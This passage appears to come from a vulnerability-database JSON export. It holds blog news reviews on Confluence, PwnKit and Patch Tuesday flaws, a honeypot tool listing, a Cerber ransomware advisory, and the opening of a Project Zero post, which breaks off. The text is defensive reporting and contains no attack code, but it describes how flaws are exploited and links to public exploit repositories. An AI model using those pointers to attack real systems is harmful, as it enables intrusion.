In this episode, I will try to revive Security News with a focus on Vulnerability Management.\n\nOn the one hand, creating such reviews requires free time, which could be spent more wisely, for example, on open source projects or original research. On the other hand, there are arguments in favor of news reviews. Keeping track of the news is part of our job as vulnerability and security specialists. And preferably not only headlines.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239095>\n\nI usually follow the news using my automated telegram channel [@avleonovnews](<https://t.me/avleonovnews>). And it looks like this: I see something interesting in the channel, I copy it to Saved Messages so that I can read it later. Do I read it later? Well, usually not. Therefore, the creation of news reviews motivates to read and clear Saved Messages. Just like doing Microsoft Patch Tuesday reviews motivates me to watch what's going on there. In general, it seems it makes sense to make a new attempt. Share in the comments what you think about it. Well, if you want to participate in the selection of news, I will be glad too.\n\nI took 10 news items from Saved Messages and divided them into 5 categories:\n\n 1. Active Vulnerabilities\n 2. Data sources\n 3. Analytics\n 4. VM vendors write about Vulnerability Management\n 5. de-Westernization of IT\n\n# Active Vulnerabilities\n\n##  "CISA warns of hackers exploiting PwnKit Linux vulnerability (CVE-2021-4034)" by [BleepingComputer](<https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-pwnkit-linux-vulnerability/>)\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity Linux vulnerability known as PwnKit to its list of bugs exploited in the wild. Unprivileged users can exploit this vulnerabilities to gain full root privileges on Linux systems with default configurations. 
Reliable proof-of-concept (PoC) exploit code has been shared online less than three hours after Qualys published technical details for PwnKit. It was January 25th. The vulnerability was found in the Polkit's pkexec component used by all major distributions (including Ubuntu, Debian, Fedora, and CentOS). It has been hiding in plain sight for more than 12 years since pkexec's first release in May 2009.\n\nThe US cybersecurity agency gave all Federal Civilian Executive Branch (FCEB) agencies three weeks, until July 18, to patch their Linux servers against PwnKit and block exploitation attempts. Even though this directive only applies to federal agencies, CISA also strongly urged all US organizations from the private and public sectors to prioritize patching this bug.\n\n_Well, it would be correct to say that not only the Americans should quickly patch this._\n\n##  "Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)" by [Qualys](<https://blog.qualys.com/vulnerabilities-threat-research/2022/06/29/atlassian-confluence-ognl-injection-remote-code-execution-rce-vulnerability-cve-2022-26134>)\n\nOn June 02, 2022, Atlassian published a security advisory about a critical severity Unauthenticated Remote Code Execution vulnerability affecting Confluence Server and Data Center. According to the advisory, the vulnerability is being actively exploited and Confluence Server and Data Center versions after 1.3.0 are affected. In order to exploit a vulnerable server, a remote attacker can send a malicious HTTP GET request with an OGNL payload in the URI. The vulnerable server once exploited would allow the attacker to execute commands remotely with user privileges running the Confluence application.\n\nTo detect CVE-2022-26134, the detection sends HTTP GET request with a specially crafted OGNL payload to determine the vulnerability on the target Confluence application. 
The OGNL payload creates a custom HTTP response header containing the output of the system command executed on Linux and Windows systems. The detection also consists of a Qualys customized OGNL payload which is platform-independent, eliminating false positives and works irrespective of the host operating system by creating a custom HTTP response header with Qualys specified value.\n\n_In this detailed technical article, Mayank Deshmukh from Qualys describes OGNL Injection, RCE Payload, Exploit POC, Exploit Analysis and Source Code Analysis. If you are interested in how such vulnerabilities are exploited and detected, check out this article._\n\n# Data sources\n\n##  "New Vulnerability Database Catalogs Cloud Security Issues" by [DarkReading](<https://www.darkreading.com/cloud/new-initiative-seeks-to-shed-light-on-cloud-vulnerabilities>)\n\nOrganizations traditionally have struggled to track vulnerabilities in public cloud platforms and services because of the lack of a common vulnerability enumeration (CVE) program like the one that MITRE maintains for publicly disclosed software security issues. A new community-based database launched this week seeks to begin addressing that issue by providing a central repository of information on known cloud service-provider security issues and the steps organizations can take to mitigate them.\n\nThe database \u2014 [cloudvulndb.org](<http://cloudvulndb.org>) \u2014 is the brainchild of security researchers at Wiz, who for some time have been advocating the need for a public catalog of known security flaws on platforms and services run by the likes of AWS, Microsoft, and Google. The database currently lists some 70 cloud security issues and vulnerabilities. Such as Azure Open Management Infrastructure (OMI) Elevation of Privilege, OMIGOD. Anyone is free to suggest new issues to add to the website or to suggest new fixes to existing issues.\n\n_It's not clear if a separate database is really needed. 
It seems that all of these entries can be added as NVD CVEs. Moreover, many vulnerabilities in this database already have CVE IDs. But the initiative is good. It proves once again that MITRE and NVD have problems with coverage._\n\n* * *\n\n# Analytics\n\n##  "MITRE shares this year's list of most dangerous software bugs (CWE Top 25)" by [BleepingComputer](<https://www.bleepingcomputer.com/news/security/mitre-shares-this-years-list-of-most-dangerous-software-bugs/>)\n\nMITRE shared this year's top 25 most common and dangerous weaknesses impacting software throughout the previous two calendar years. These bugs are considered dangerous because they're usually easy to discover, come with a high impact, and are prevalent in software released during the last two years.\n\n_Let's see what's on top:_\n \n \n 1 CWE-787 Out-of-bounds Write \n 2 CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') \n 3 CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') \n 4 CWE-20 Improper Input Validation \n 5 CWE-125 Out-of-bounds Read \n 6 CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\n\n_Seems to be true, although 'OS Command Injection' could be higher. Well, we need to remember that CWE identifiers are assigned manually to vulnerabilities by some analysts and therefore there may be classification errors. 
But it's still interesting._\n\n##  "Cyberattacks via Unpatched Systems Cost Orgs More Than Phishing" by [DarkReading](<https://www.darkreading.com/vulnerabilities-threats/cyberattacks-bug-exploits-more-costly-incidents>)\n\n_This article is based on research by Tetra Defense, a leading incident response, cyber risk management and digital forensics firm based in Madison, Wisconsin._\n\nAttackers continue to find significant success targeting unpatched servers and vulnerable remote-access systems, researchers say -- and these types of compromises cost victim organizations 54% more than compromises caused by user actions (i.e., falling for phishing and opening malicious documents).\n\nAccording to a report by Tetra Defense, which analyzed incident data from the first quarter, unpatched vulnerabilities and exposing risky services\u2014such as Remote Desktop Protocol (RDP)\u2014account for 82% of successful attacks, while social-engineering employees to take some action accounted for just 18% of successful compromises. The article also mentions known vulnerabilities: the ProxyShell exploit for Microsoft Exchange servers and the Log4Shell vulnerability in the Java Log4j library.\n\nTwo controls -- comprehensive patching and using multifactor authentication (MFA) -- could have prevented nearly 80% of the investigated incidents.\n\n_Good point in the article: "Data on successful compromises can help companies determine the most critical attack vectors to address, but it should be noted that the conclusions depend greatly on the specific incident-response firm". 
But the fact that MFA and patching are very important is true._\n\n##  "Zero-Days Aren't Going Away Anytime Soon & What Leaders Need to Know" by [DarkReading](<https://www.darkreading.com/attacks-breaches/zero-days-aren-t-going-away-anytime-soon-and-what-leaders-need-to-know>)\n\n_The article was written by Dan Schiappa, Chief Product Officer of Arctic Wolf, a Security Operations company_.\n\nBoth Google and Mandiant tracked a record number of zero-days last year. More zero-days are being discovered because security companies are getting better at finding them \u2014 not necessarily because hackers are coming up with new vulnerabilities. Not all zero-days are created equal. Some require sophisticated and novel techniques, like the attack on SolarWinds, and others exploit simple vulnerabilities in commonly used programs like Windows. Thankfully, there are some basic cyber hygiene strategies that can keep your organization sufficiently prepared to mitigate zero-day exploits.\n\n 1. Ensure that the technology your organization has is sufficient for protecting from the unknown. Many zero-days may never hit a hard drive, so pointing threat detection tools there could be fruitless.\n 2. Patching is integral to protection against exploits. Staying on top of guidance from industry organizations like International Information System Security Certification Consortium (ISC)2 or federal authorities like the Cybersecurity and Infrastructure Security Agency is a good way to prioritize the exploit.\n 3. Zero-day exploits are those that the vendor doesn't know exist, and therefore no patch is available. In some cases, protection technologies can use behavioral detections to block certain activities, while in other cases, using detection technologies or human expertise in a security operations center is the only defense. 
Investing in the human element of security will place an organization in the best position to limit the financial and data losses zero-days can incur.\n\nWhile patching is proper preparation, the investment in trained security professionals, in-house or outsourced, is the best defense against zero-days.\n\n_In general, I agree with everything. My opinion: while critical known vulnerabilities are not fixed promptly, it is premature to think about Zero-Days. And of course, dealing with Zero-Days is primarily the task of the SOC._\n\n# VM vendors write about Vulnerability Management\n\n_I would like to start here with an article with a provocative title_\n\n##  "Why We're Getting Vulnerability Management Wrong" by [DarkReading](<https://www.darkreading.com/vulnerabilities-threats/why-we-re-getting-vulnerability-management-wrong>)\n\n_The article was written by Liran Tancman, CEO of Rezilion, a platform vendor that allows you to map, validate and eliminate software vulnerabilities._\n\nSometimes, too much information is a mixed blessing. Security teams use multiple vulnerability scanners in an attempt to cope with a significant rise in both attack surface diversity and software vulnerabilities. But they soon find themselves overwhelmed with results, which leads to a growing backlog of bugs that need to be fixed.\n\n[A recent analysis from RAND Corporation](<https://weis2019.econinfosec.org/wp-content/uploads/sites/6/2019/05/WEIS_2019_paper_53.pdf>) found no notable reduction of breaches in organizations with mature vulnerability management programs.\n\n_By the way, an interesting study, it would be right to give it a separate episode, I guess. Leave a comment if you'd like it._\n\n[Rezilion's own runtime research analysis](<https://www.rezilion.com/runtime-analysis-research/>) finds, on average, only 15% of discovered vulnerabilities are loaded into memory, which makes them exploitable. 
That means, on average, only 15% of flaws require priority patching \u2014 or patching at all. \n\n_Also an interesting topic that deserves a separate episode._\n\nRezilion conducted an analysis of 20 of the most popular container images. The findings showed more than 4,347 known vulnerabilities. 75% of those rated as critical or high in severity did not load to memory and posed no risk. Organizations can use runtime analysis to prioritize remediation of vulnerabilities. A vulnerability in a package that isn't being loaded to memory can't be exploited by an attacker.\n\n_This is a long-standing dispute: is it necessary to fix vulnerabilities in software that is not running at the moment? Well, usually the answer is yes, it is necessary. Because no one can guarantee that the software will suddenly not be launched. But if it is possible to identify vulnerabilities in software that is currently running or was launched not so long ago, then this is a good source of data for additional prioritization. Why not. It's good that Rezilion highlights this._\n\n##  "Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0" by [Qualys](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n_To tell the truth, I have long been interested in what's new in Qualys Vulnerability Management, Detection and Response._\n\nAccording to the recently released Verizon DBIR report, vulnerability exploitation continued to be one of the top three attack vectors exploited by bad actors in 2021 to break into organizations. As of this writing, it\u2019s only June, but more than 10,000 vulnerabilities have already been disclosed in 2022, according to the National Vulnerability Database (NVD). As if that weren\u2019t bad enough, the rate of increase of ransomware attacks last year was more than the last five years combined.\n\n 1. 
The resources required to patch all these vulnerabilities have not kept up with the pace at which vulnerabilities are disclosed and exploited.\n 2. The correct remediation path is not always straightforward. In some cases, patching a vulnerability can require deploying a patch, making a configuration change, or both.\n\nAll these introduce delays in the remediation process.\n\nQualys VMDR 2.0 introduces TruRisk scores that help organizations prioritize vulnerabilities based on risk ratings that weigh multiple factors such as exploit code maturity, exploitation in the wild, and multiple other factors that accurately measure risk.\n\n_In general, it looks like Tenable vulnerability priority rating (VPR). It's probably generated the same way. But the technical details of TruRisk are not given here._\n\nA key step in any remediation workflow is good communication between the vulnerability management (VM) team and the remediation team. However, these two teams use different products and different terminology. The VM team understands the risk and QIDs. The remediation team understands patches. Qualys maps the selected vulnerabilities to the right patches and configuration changes required to remediate them specific to the organization\u2019s unique environment. For some assets, this entire process can be automated with VMDR 2.0. For example, a zero-touch automation job can be created to patch non-mission critical assets that will automatically execute as soon as a new vulnerability with a Qualys Detection Score >90 is detected.\n\nIntegrated Patch Management is Simply Faster. On average, organizations that use Qualys VMDR + Patch Management remediate vulnerabilities 35% faster than organizations that use separate tools. Even better, with some vulnerabilities the difference can be 63% faster with a combined solution.\n\n_I agree that the focus of the VM should be on Remediation and it's good that Qualys is pushing this topic. 
Are there enough new features to call this update VMDR 2.0? I don't think so yet. It seems that if Remediation were fully automated for 100% of the hosts (which requires a fundamentally different approach to functional testing after the patch), then it would be 2.0. But marketers of Qualys know better._\n\n##  "Modern IT Security Teams\u2019 Inevitable Need for Advanced Vulnerability Management" by [Threatpost](<https://threatpost.com/modern-it-security-teams-inevitable-need-for-advanced-vulnerability-management/180018/>) (sponsored by Secpod)\n\nToday\u2019s modern attack surface needs a next-gen, advanced vulnerability management approach to deal with the complex, ever-evolving attack surfaces and to curb cyberattacks.\n\nWhy Conventional Vulnerability Management is not the Best-fit for the Modern Security Landscape:\n\n 1. Vulnerabilities beyond CVEs are overlooked. Numerous security risks exist like a poorly configured setting, asset exposures, deviation in security controls, missing security patches, and security posture anomalies.\n 2. Lack of integrated remediation controls. Most of the traditional vulnerability management tools in the market do not come with integrated patching to remediate vulnerabilities.\n 3. Siloed Interfaces and Multiple-point Solutions Approach. Conventional vulnerability management solutions rely on multiple tools to execute each step, making it hard for IT security teams.\n 4. Manual Methods and Repetitive Processes. Traditional Vulnerability management tools are still not fully automated.\n\n_And to overcome these issues, you need Advanced Vulnerability Management from Secpod. 
In general, the list of cons looks fair, and the fact that they pay attention to vulnerabilities in addition to CVEs seems to me very correct._\n\n# de-Westernization of IT\n\nI have nothing against people or companies from Western countries. According to Google analytics, the majority of visitors to my [avleonov.com](<http://avleonov.com>) blog are actually from the US (then India, China, and Russia). However, that's how it goes. Some companies stop working in Russia because of the sanctions. And Russian information security specialists should take into account these risks, mitigate them and warn colleagues who may also face these problems.\n\nLast week there was news that SAP and Microsoft will block Russian companies' access to software updates, including security updates, in August. For some reason, the news was published in Bloomberg without reference to the source.\n\n> "It's not just industry that's affected. SAP SE and Microsoft Corp. are due to stop updates and services for Russian companies in August, leaving businesses and government services that rely on their software potentially vulnerable to security breaches and viruses."\n\nSome time later, this paragraph was rewritten. The mention of August was removed. Unfortunately, the fact that the leading Western media are spreading propaganda and rumors is no longer surprising. I do not even want to give a link to the article, whoever is interested can google it on their own.\n\nHowever, what if this really happens? What if we can no longer use WSUS and SCCM to update the Windows infrastructure? And even more, if we get some malicious functionality in the updates, which will be activated over time. Unfortunately, what once seemed like a minor risk and paranoia is now becoming more than real. 
Therefore, we need to think in advance about network isolation, alternative ways to update the Windows infrastructure, implement control over backups, implement information security tools that could compensate for the lack of patches to some extent. And most importantly, we need to quickly reduce dependence on the software of unstable vendors. And this is now relevant not only for Russia, but also for the BRICS countries and other countries that are already under US sanctions or may potentially face them.\n\n* * *\n\nI also finally decided to launch a Russian-language telegram channel ["\u0423\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0438 \u043f\u0440\u043e\u0447\u0435\u0435" @avleonovrus](<https://t.me/avleonovrus>). I think it will be updated a little more often, and there will be more reactions to our local Russian topics. Therefore, those who are interested, subscribe.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-06T12:13:56", "type": "avleonov", "title": "Vulnerability Management news and publications #1", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4034", "CVE-2022-26134"], "modified": "2022-07-06T12:13:56", "id": "AVLEONOV:E820C062BC9959711E1D1152D8848072", "href": "https://avleonov.com/2022/07/06/vulnerability-management-news-and-publications-1/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:43:30", "description": "Hello everyone! This time, let's talk about recent vulnerabilities. I'll start with Microsoft Patch Tuesday for September 2021. I created a report using my Vulristics tool. You can see [the full report here](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_september2021_report_avleonov_comments.html>).\n\nThe most interesting thing about the September Patch Tuesday is that the top 3 VM vendors ignored almost all RCEs in their reviews. However, there were interesting RCEs in the Office products. And what is most unforgivable is that they did not mention CVE-2021-38647 RCE in OMI - Open Management Infrastructure. Only ZDI wrote about this.\n\n## Microsoft Patch Tuesday September 2021\n\n### OMIGOD\n\n[Dubbed \u201cOMIGOD\u201d by researchers at Wiz.io](<https://www.infosecurity-magazine.com/news/microsoft-fixes-omigod-mshtml/>), the bugs could enable a remote attacker to gain root access to Linux virtual machines running on Azure. \u201cWe conservatively estimate that thousands of Azure customers and millions of endpoints are affected. In a small sample of Azure tenants we analyzed, over 65% were unknowingly at risk,\u201d the firm warned. \n\nSo, OMIGOD RCEs and EOPs with detected exploitation in the wild are in the Vulristics TOP. What else?\n\n### Chrome/Chromium/Edge RCE\n\nAn exploitation in the wild has been seen for Chrome/Chromium/Edge vulnerability CVE-2021-30632. Still no comments from the VM vendors, only from ZDI.\n\n### WLAN AutoConfig RCE\n\nOnly Qualys and ZDI mentioned CVE-2021-36965 Remote Code Execution in Windows WLAN AutoConfig Service. 
"This would be highly useful in a coffee shop scenario where multiple people are using an unsecured WiFi network."\n\nAlso note several EOPs in Windows Kernel, Windows Common Log File System Driver and Windows Print Spooler.\n\n### MSHTML RCE\n\nBut of course, people were mostly waiting for fixes for a vulnerability that was disclosed not on Patch Tuesday, but a week earlier. However, the updates only became available on September 14th. It is CVE-2021-40444 Microsoft MSHTML Remote Code Execution Vulnerability. "A critical zero-day RCE vulnerability in Microsoft\u2019s MSHTML (Trident) engine that was exploited in the wild in limited, targeted attacks". "To exploit this vulnerability, an attacker would need to create a specially crafted Microsoft Office document containing a malicious ActiveX control". Well, people are saying that ActiveX is not being used in new exploits for this vulnerability. This is serious, consider this in your anti-phishing programs and, of course, install patches.\n\n## Non-Microsoft vulnerabilities\n\nI would also like to say a few words about [other recent non-Microsoft vulnerabilities](<https://avleonov.com/vulristics_reports/september_2021_other_report_avleonov_comments.html>).\n\n### Confluence RCE\n\nI would like to mention the massively exploited CVE-2021-26084 Confluence RCE. A week passed between the release of the newsletter and the public exploit. If your organization has Confluence, keep an eye on it and never make it available at the perimeter of your network.\n\n### Ghostscript RCE\n\nAlso, the "[Ghostscript provider Artifex Software released a security advisory](<https://www.jpcert.or.jp/english/at/2021/at210039.html>) regarding a vulnerability (CVE-2021-3781) that allows arbitrary command execution in Ghostscript. On a server running Ghostscript, an attacker may execute arbitrary commands by processing content that exploits this vulnerability". 
There is a [public exploit](<https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50>) for this vulnerability. Ask your developers if they use it to process SVG files.\n\n### Pegasus FORCEDENTRY macOS RCE\n\nAnd finally the RCE CVE-2021-30860 FORCEDENTRY vulnerability that was used in Pegasus spyware. The exploit that was spotted in the wild relies on malicious PDF files. The vulnerability became famous mainly because of iPhone attacks, but [there are also patches for macOS Big Sur 11.6 and 2021-005 Catalina](<https://nakedsecurity.sophos.com/2021/09/14/apple-products-vulnerable-to-forcedentry-zero-day-attack-patch-now/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-18T23:22:00", "type": "avleonov", "title": "Security News: Microsoft Patch Tuesday September 2021, OMIGOD, MSHTML RCE, Confluence RCE, Ghostscript RCE, FORCEDENTRY Pegasus", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-30632", "CVE-2021-30860", "CVE-2021-36965", "CVE-2021-3781", "CVE-2021-38647", "CVE-2021-40444"], "modified": "2021-09-18T23:22:00", "id": 
"AVLEONOV:5945665DFA613F7707360C10CED8C916", "href": "https://avleonov.com/2021/09/19/security-news-microsoft-patch-tuesday-september-2021-omigod-mshtml-rce-confluence-rce-ghostscript-rce-forcedentry-pegasus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-06-14T17:20:43", "description": "ConfluencePot is a simple [honeypot](<https://www.kitploit.com/search/label/HoneyPot> \"honeypot\" ) for the Atlassian Confluence unauthenticated and remote OGNL [injection](<https://www.kitploit.com/search/label/Injection> \"injection\" ) [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) ([CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134> \"CVE-2022-26134\" )).\n\n## About the vulnerability\n\nYou can find the official advisory by Atlassian to this vulnerability [here](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html> \"here\" ). For details about the inner workings and [exploits](<https://www.kitploit.com/search/label/Exploits> \"exploits\" ) in the wild you should refer to the reports by [Rapid7](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/> \"Rapid7\" ) and [Cloudflare](<https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/> \"Cloudflare\" ). Affected but not yet patched systems should be deemed **compromised** until further investigation.\n\n## About the tool\n\nConfluencePot is written in Golang and implements its own HTTPS server to minimize the overall attack surface. To make it appear like a legit Confluence instance it returns a bare-bones version of a Confluence landing page. 
Log output is written to stdout and a log file on disk. ConfluencePot **DOES NOT** allow attackers to execute commands/code on your machine; it only logs requests and returns a bogus response.\n\n### Building & Running it\n\nYou need a recent version of Golang to run/build confluencePot and the appropriate privileges to bind to port 443. We recommend executing it in a tmux session for easier handling. To run ConfluencePot you either need to create a self-signed TLS certificate with _openssl_ or request one from e.g. _Let's Encrypt_.\n \n \n go build confluencePot.go \n ./confluencePot \n \n\n## Testing and Issues\n\nConfluencePot was tested using the public exploit by [Nwqda](<https://github.com/Nwqda/CVE-2022-26134> \"Nwqda\" ), which seems to be the most used variant in the wild at the time of writing. If you find anything wrong with confluencePot please feel free to open an issue or send us a pull request.\n\nFollow us on [Twitter](<https://www.kitploit.com/search/label/Twitter> \"Twitter\" ) \\--> [@SI_FalconTeam](<https://twitter.com/SI_FalconTeam> \"@SI_FalconTeam\" ) <\\-- to stay up to date with our latest research. 
Stay safe!\n\n**[Download confluencePot](<https://github.com/SIFalcon/confluencePot> \"Download confluencePot\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T12:30:00", "type": "kitploit", "title": "confluencePot - Simple Honeypot For Atlassian Confluence (CVE-2022-26134)", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2613", "CVE-2022-26134"], "modified": "2022-06-13T12:30:00", "id": "KITPLOIT:3043339745958474082", "href": "http://www.kitploit.com/2022/06/confluencepot-simple-honeypot-for.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-12-14T15:20:51", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/Cerber-targeting-organizations-with-publicly_TA202158.pdf>)\n\nCerber, ransomware that 
mysteriously vanished in 2019, has reappeared with new encryption. The new Cerber includes fresh source code and makes use of the Crypto++ library, whereas the previous form made use of Windows CryptoAPI libraries.\n\nCerber is utilizing the following two vulnerabilities:\n\nCVE-2021-26084: a remote code execution vulnerability that allows an attacker to execute arbitrary code in Atlassian Confluence Servers and Datacenters versions 6.13.22, 6.14.0-7.4.10, 7.5.0-7.11.5, 7.12.0-7.12.4. It has been fixed in versions 6.13.23, 7.4.11, 7.11.6, and 7.12.5.\n\nCVE-2021-22205: GitLab Community and Enterprise Edition versions 11.9.0-13.8 are affected by a command execution vulnerability that can be exploited by uploading an image that runs via the ExifTool of GitLab Workhorse and achieving remote code execution via a specially designed file. It has been fixed in version 13.9.\n\nThe new Cerber ransomware uses either of the two vulnerabilities mentioned above and then enters victims' systems and encrypts their files. 
Cerber ransomware places the ransom note in the file **__$$RECOVERY_README$$__.html**, and all the encrypted files have an extension of .locked.\n\nOrganizations can patch both vulnerabilities by upgrading their systems to fixed versions.\n\nThe TTPs used by **Cerber** include:\n\nTA0002 - Execution\n\nT1059 - Command and Scripting Interpreter\n\nT1059.003 - Command and Scripting Interpreter: Windows Command Shell\n\nTA0007 - Discovery\n\nT1012 - Query Registry\n\nT1082 - System Information Discovery\n\n#### Vulnerability Details\n\n#### Indicators of Compromise (IoCs)\n\n#### Patch Links\n\n<https://jira.atlassian.com/browse/CONFSERVER-67940>\n\n#### References\n\n<https://gitlab.com/gitlab-org/gitlab/-/issues/327121>\n\n<https://packetstormsecurity.com/files/164768/GitLab-Unauthenticated-Remote-ExifTool-Command-Injection.html>\n\n<https://packetstormsecurity.com/files/164013/Confluence-Server-7.12.4-OGNL-Injection-Remote-Code-Execution.html>\n\n<https://otx.alienvault.com/pulse/61af78ee529faac40b2de15e/related>\n\n<https://app.any.run/tasks/c59f562e-4a61-459c-b0a3-9890c412b0ea/>\n\n<https://www.bleepingcomputer.com/news/security/new-cerber-ransomware-targets-confluence-and-gitlab-servers/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T13:50:15", "type": "hivepro", "title": "Cerber targeting organizations with publicly available exploits", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205", "CVE-2021-26084"], "modified": "2021-12-14T13:50:15", "id": "HIVEPRO:E9C63D0D70D3232F21940B33FC205340", "href": "https://www.hivepro.com/cerber-targeting-organizations-with-publicly-available-exploits/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2022-06-30T13:56:58", "description": "Posted by Maddie Stone, Google Project Zero\n\nThis blog post is an overview of a talk, \u201c 0-day In-the-Wild Exploitation in 2022\u2026so far\u201d, that I gave at the FIRST conference in June 2022. The slides are available [here](<https://github.com/maddiestone/ConPresentations/blob/master/FIRST2022.2022_0days_so_far.pdf>).\n\nFor the last three years, we\u2019ve published annual year-in-review reports of 0-days found exploited in the wild. The most recent of these reports is the [2021 Year in Review report](<https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html>), which we published just a few months ago in April. While we plan to stick with that annual cadence, we\u2019re publishing a little bonus report today looking at the in-the-wild 0-days detected and disclosed in the first half of 2022. \n\nAs of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we\u2019ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. 
